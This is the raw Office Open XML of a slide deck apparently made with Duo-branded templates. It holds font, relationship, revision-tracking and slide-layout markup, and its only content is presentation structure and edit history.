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7" r:id="rId1"/>
    <p:sldMasterId id="2147483778" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId15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Lst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId155"/>
      <p:bold r:id="rId156"/>
      <p:italic r:id="rId157"/>
      <p:boldItalic r:id="rId158"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId159"/>
      <p:bold r:id="rId160"/>
      <p:italic r:id="rId161"/>
      <p:boldItalic r:id="rId162"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Permanent Marker" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId163"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId164"/>
      <p:bold r:id="rId165"/>
      <p:italic r:id="rId166"/>
      <p:boldItalic r:id="rId167"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId168"/>
      <p:bold r:id="rId169"/>
      <p:italic r:id="rId170"/>
      <p:boldItalic r:id="rId1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36D845-0C04-1241-A878-7EAE781042CE}" v="2" dt="2019-10-22T15:44:00.052"/>
  </p1510:revLst>
</p1510:revInfo>
</file>

<file path=ppt/tableStyles.xml><?xml version="1.0" encoding="utf-8"?>
<a:tblStyleLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" def="{33D0C5A7-A392-4A63-A77E-500D87993C42}">
  <a:tblStyle styleId="{33D0C5A7-A392-4A63-A77E-500D87993C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94710"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="192" d="100"/>
          <a:sy n="192" d="100"/>
        </p:scale>
        <p:origin x="18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5.fntdata"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font16.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6.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17.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7.fntdata"/><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font" Target="fonts/font2.fntdata"/><Relationship Id="rId177" Type="http://schemas.microsoft.com/office/2015/10/relationships/revisionInfo" Target="revisionInfo.xml"/><Relationship Id="rId172"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3.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10.fntdata"/><Relationship Id="rId169"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notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId175"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1.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fntdata"/><Relationship Id="rId176" Type="http://schemas.microsoft.com/office/2016/11/relationships/changesInfo" Target="changesInfos/changesInfo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2.fntdata"/><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tanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}"/>
    <pc:docChg chg="undo modSld">
      <pc:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:52:10.257" v="51" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:43:58.749" v="6" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:43:58.749" v="6" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="257"/>
            <ac:spMk id="907" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:44:54.175" v="7" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:44:54.175" v="7" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="258"/>
            <ac:spMk id="914" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:45:07.386" v="8" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:45:07.386" v="8" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="263"/>
            <ac:spMk id="947" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:45:47.949" v="17" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="268"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:45:47.949" v="17" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="268"/>
            <ac:spMk id="1008" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:46:02.194" v="23" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="269"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:46:02.194" v="23" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="269"/>
            <ac:spMk id="1015" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:46:52.052" v="24" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:46:52.052" v="24" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="277"/>
            <ac:spMk id="1068" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:47:38.557" v="35" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="289"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:47:30.280" v="30" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="289"/>
            <ac:spMk id="1147" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:47:38.557" v="35" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="289"/>
            <ac:spMk id="1150" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:47:17.640" v="27" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="291"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:47:17.640" v="27" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="291"/>
            <ac:spMk id="1168" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:48:57.104" v="43" actId="5793"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="325"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:48:57.104" v="43" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="325"/>
            <ac:spMk id="1404" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:51:05.557" v="46" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="387"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:51:05.557" v="46" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="387"/>
            <ac:spMk id="1866" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:51:15.129" v="47" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="390"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:51:15.129" v="47" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="390"/>
            <ac:spMk id="1883" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:51:34.619" v="49" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="394"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:51:34.619" v="49" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="394"/>
            <ac:spMk id="1910" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:51:48.487" v="50" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="399"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:51:48.487" v="50" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="399"/>
            <ac:spMk id="1943" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:52:10.257" v="51" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="404"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Mark Stanislav" userId="50b1e38e530dc201" providerId="LiveId" clId="{8436D845-0C04-1241-A878-7EAE781042CE}" dt="2019-10-22T15:52:10.257" v="51" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="404"/>
            <ac:spMk id="197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705c3bc8f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705c3bc8f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c1324abf4_4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2c1324abf4_4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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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2beb268a0d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2beb268a0d_4_1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2beb268a0d_4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2beb268a0d_4_1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2beb268a0d_4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2beb268a0d_4_1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2beb268a0d_4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2beb268a0d_4_1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2beb268a0d_4_1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2beb268a0d_4_1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2beb268a0d_4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2beb268a0d_4_1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2beb268a0d_4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2beb268a0d_4_1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2beb268a0d_4_1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6457dff9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6457dff9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2beb268a0d_4_1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2beb268a0d_4_1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2beb268a0d_4_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2beb268a0d_4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63769cd445_0_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63769cd445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beb268a0d_4_1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beb268a0d_4_1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2beb268a0d_4_1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2beb268a0d_4_1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2beb268a0d_2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2beb268a0d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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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5491f5320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0" name="Google Shape;1770;g5491f5320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2beb268a0d_2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2beb268a0d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462b983d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5462b983d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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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2beb268a0d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g2beb268a0d_2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9" name="Google Shape;1799;g2beb268a0d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2beb268a0d_2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5" name="Google Shape;1805;g2beb268a0d_2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2beb268a0d_2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2beb268a0d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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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2beb268a0d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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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c1324abf4_4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2c1324abf4_4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beb268a0d_2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2beb268a0d_2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2beb268a0d_2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2beb268a0d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beb268a0d_2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beb268a0d_2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2beb268a0d_2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2beb268a0d_2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55f5ca276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55f5ca276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2beb268a0d_2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2beb268a0d_2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55f5ca27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55f5ca27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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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bb743de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bb743de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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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2beb268a0d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2beb268a0d_2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8" name="Google Shape;1928;g2beb268a0d_2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2beb268a0d_2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2beb268a0d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2beb268a0d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2beb268a0d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2c453d981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2c453d981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2c453d981a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2c453d981a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2c453d981a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2c453d981a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2beb268a0d_4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5" name="Google Shape;1965;g2beb268a0d_4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2beb268a0d_4_1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2beb268a0d_4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c41790a2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2c41790a2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2beb268a0d_4_1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2beb268a0d_4_1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1de39d326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1de39d326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c41790a21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c41790a2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5491f53202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5491f5320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c1324abf4_4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c1324abf4_4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bb743ded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bb743ded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705c3bc8f6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705c3bc8f6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c1324abf4_4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2c1324abf4_4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c453d981a_2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2c453d981a_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2c453d981a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2c453d981a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2c453d981a_2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2c453d981a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c453d981a_2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c453d981a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c453d981a_2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2c453d981a_2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c453d981a_2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c453d981a_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c453d981a_2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c453d981a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2c453d981a_2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2c453d981a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c453d981a_2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c453d981a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705c3bc8f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705c3bc8f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2a36e72ce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2a36e72ce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5c0b288fb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5c0b288fb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c41790a2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c41790a2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2c41790a2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2c41790a2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be8f52ae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2be8f52ae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5491f53202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5491f53202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5491f53202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5491f53202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be8f52ae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be8f52ae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be8f52ae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2be8f52a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c453d981a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2c453d981a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62b0311f5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62b0311f5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63769cd445_0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63769cd445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2be8f52ae8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2be8f52ae8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be8f52ae8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2be8f52ae8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2c453d981a_2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2c453d981a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a36e72ce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2a36e72ce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beb268a0d_3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2beb268a0d_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2c453d981a_2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2c453d981a_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c453d981a_2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c453d981a_2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5c0b288fb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5c0b288fb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5c0b288fb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5c0b288fb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2a36e72ce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2a36e72ce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2c453d981a_2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2c453d981a_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2c453d981a_2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c453d981a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5462b983d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5462b983d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2c453d981a_2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2c453d981a_2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c453d981a_2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c453d981a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5462b983d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5462b983d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2c453d981a_2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2c453d981a_2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2c453d981a_2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2c453d981a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2c453d981a_2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2c453d981a_2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c453d981a_2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2c453d981a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c1324abf4_4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2c1324abf4_4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beb268a0d_2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2beb268a0d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5c0b288fb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5c0b288fb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5c0b288fb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5c0b288fb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5c0b288fbb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5c0b288fb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beb268a0d_2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beb268a0d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2c01410f8b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2c01410f8b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c01410f8b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2c01410f8b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2c01410f8b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2c01410f8b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2c453d981a_2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2c453d981a_2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2c453d981a_2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2c453d981a_2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c1324abf4_4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c1324abf4_4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5c0b288fb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5c0b288fb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2c453d981a_2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2c453d981a_2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2c453d981a_2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c453d981a_2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5c0b288fb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5c0b288fb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2c453d981a_2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2c453d981a_2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c453d981a_2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2c453d981a_2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2c453d981a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2c453d981a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63769cd445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63769cd445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2beb268a0d_5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2beb268a0d_5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2beb268a0d_2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2beb268a0d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c1324abf4_4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c1324abf4_4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2beb268a0d_2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2beb268a0d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5491f532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5491f532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c0cfcbec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c0cfcbec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5491f5320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5491f5320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2beb268a0d_4_1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2beb268a0d_4_1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4287b116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4287b116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2beb268a0d_2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2beb268a0d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2beb268a0d_2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2beb268a0d_2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2beb268a0d_2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2beb268a0d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eb268a0d_2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2beb268a0d_2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5b7476b5ff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5b7476b5ff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beb268a0d_2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2beb268a0d_2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2c1324abf4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2c1324abf4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2c1324abf4_4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2c1324abf4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2c1324abf4_4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2c1324abf4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c1324abf4_4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2c1324abf4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2c1324abf4_4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2c1324abf4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2c1324abf4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2c1324abf4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2c1324abf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2c1324abf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2c1324abf4_4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2c1324abf4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2beb268a0d_2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2beb268a0d_2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0.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1 - Title (computer)"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1800" y="442100"/>
            <a:ext cx="4860300" cy="2368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4075" y="2838325"/>
            <a:ext cx="3121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1" name="Google Shape;11;p2" descr="duo green mark.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397825" y="4163475"/>
            <a:ext cx="1533925" cy="499750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Google Shape;12;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-837602">
            <a:off x="3837495" y="-627447"/>
            <a:ext cx="7019338" cy="7522544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;13;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294075" y="4878650"/>
            <a:ext cx="88500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4" name="Google Shape;14;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192000" y="4424674"/>
            <a:ext cx="1320700" cy="2385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2 - Body with bullets/pattern">
  <p:cSld name="SECTION_HEADER_3">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9" name="Google Shape;59;p11"/>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1"/>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61" name="Google Shape;61;p11"/>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62" name="Google Shape;62;p11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8317850" y="828675"/>
            <a:ext cx="1987200" cy="19872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3555850" y="828677"/>
            <a:ext cx="3878700" cy="3878700"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1143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22850" y="4878650"/>
            <a:ext cx="88212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65" name="Google Shape;65;p11"/>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E4 - Numbers (2 large)">
  <p:cSld name="BIG_NUMBER_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 671"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Google Shape;672;p102"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="592500"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3" name="Google Shape;673;p102"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="592500"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674" name="Google Shape;674;p102"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75" name="Google Shape;675;p102"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613525"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6" name="Google Shape;676;p102"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613525"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77" name="Google Shape;677;p10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78" name="Google Shape;678;p102"/>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E5 - Numbers (2 large, title)">
  <p:cSld name="BIG_NUMBER_1_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 679"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680" name="Google Shape;680;p103"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>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1" name="Google Shape;681;p103"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82" name="Google Shape;682;p103"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="592500"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3" name="Google Shape;683;p103"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="592500"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84" name="Google Shape;684;p103"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="3" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613525"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5" name="Google Shape;685;p103"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613525"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86" name="Google Shape;686;p10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87" name="Google Shape;687;p103"/>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E6 - Numbers (3 large)">
  <p:cSld name="BIG_NUMBER_1_1_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 688"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="689" name="Google Shape;689;p104"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90" name="Google Shape;690;p104"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59250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1" name="Google Shape;691;p104"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58575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2" name="Google Shape;692;p104"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3309075"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3" name="Google Shape;693;p104"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3302325"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4" name="Google Shape;694;p104"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4" hasCustomPrompt="1"/>
          </p:nvPr>
